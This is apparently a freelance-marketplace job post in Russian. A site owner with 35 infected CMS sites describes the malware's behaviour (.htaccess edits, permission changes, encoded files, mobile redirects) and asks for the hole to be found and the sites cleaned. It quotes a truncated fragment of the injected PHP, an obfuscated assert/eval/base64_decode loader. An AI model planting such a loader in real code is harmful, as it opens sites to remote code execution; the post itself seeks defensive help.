Хостинг jino. 35 сайтов. Битрикс, Wordpress, OpenCart, Joomla.

Поведение вируса:

1. Изменение файла .htaccess;

2. Смена прав на папки;

3. Вставка в некоторые файлы с расширением php кода примерно след. содержания: $_ = strrev("tress\x61"); @$_("e\166a\154\050b\141\163\145\066\064\137\144\145c\157\144\145\050'aWYgKChwcmVnX21hdGNoKCcvdG.... и т.д.

4. Создание файлов txt и php с кодированным содержимым.

Последствия - мобильный редирект. Пример сайта с заразой в личку ).

Задача минимум: найти дырку от куда лезут и исправить, рекомендации;

Задача максимум: задача минимум + чистка всех сайтов;

Пожелание: т.к. зараза появляется уже неоднократно, хочется заручиться гарантиями от повторного заражения, готов рассмотреть рациональные предложения

12 лет назад
studia55x5
Игорь 
41 год
12 лет в сервисе
Был
5 месяцев назад

Заявки фрилансеров

Нет заявок фрилансеров